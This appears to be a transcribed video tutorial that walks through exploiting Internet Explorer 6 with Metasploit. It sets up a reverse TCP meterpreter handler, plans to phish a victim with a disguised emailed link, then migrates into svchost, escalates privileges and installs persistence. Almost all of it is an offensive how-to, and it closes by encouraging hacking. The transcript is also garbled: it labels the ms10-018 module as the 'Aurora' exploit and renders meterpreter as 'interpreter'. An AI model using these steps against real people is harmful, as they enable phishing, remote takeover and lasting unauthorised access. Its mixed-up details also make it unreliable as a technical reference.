Good evening, Hakology. In tonight's video we're going to be looking at the Aurora 0-day exploit for Internet Explorer 6. First thing you'll want to do is load MSF console and type search Explorer. This will show all the modules containing the word Explorer, and you're looking for Windows browser ms10-018 behaviours. And this is basically a buffer overflow in Internet Explorer that allows for remote code execution. So to select the payload, we type use Windows browser ms10-018-IE behaviours. Press enter. And then what we're going to do next is set the payload, and we're going to set this to Windows interpreter reverse TCP. What reverse TCP actually does is connect back to us. So usually the firewalls have allow all outbound traffic, so reverse makes it easy for us to connect through a firewall. So the first variable you want to set with the payload and exploit is the host, which is the local address of your machine, and then you want to set the port to port 80, which is the default port for HTTP. And then we set the URI path. We're going to set this to pound, and set lhost equal to 192.168.1.101, which is the address of our host machine, and type exploit. Okay, and you'll see that the handler has been started and is waiting for connections. So now if we swap to the Windows box and say this had been emailed, just wait for Explorer to load. So take for instance this URL had arrived in an email, and we direct them to this. We could do some clever masking with some HTML just to make it look like a text link. They click this link and it connects back to our machine, which as soon as the connection's made, the interpreter shell is injected, and with this exploit this runs an auto migrate because it actually crashes Explorer. So basically it looks like they click on a link and Explorer crashes, but really it spawns a interpreter session. So just wait for the interpreter session to start. You can see it's auto migrating. Now in this video I'm just going to show you how to migrate. So we type sessions-i1, so that's to interact with interpreter session 1. You can see all sessions by typing sessions. Just type ps to list the processes on the host machine, and we're changing to 796, which is the svc host.exe, which never gets closed. And then we can run sysinfo, which is a interpreter command to give us more information about the system. If we want to run get privs, it ups our privileges on the box, and then run persistence actually installs an interpreter on the machine, so it connects back to us every time. As you can see there, it's connected back to the machine. I hope you've enjoyed tonight's episode. That's Hakology. Have fun hacking as always, and we'll be back really soon.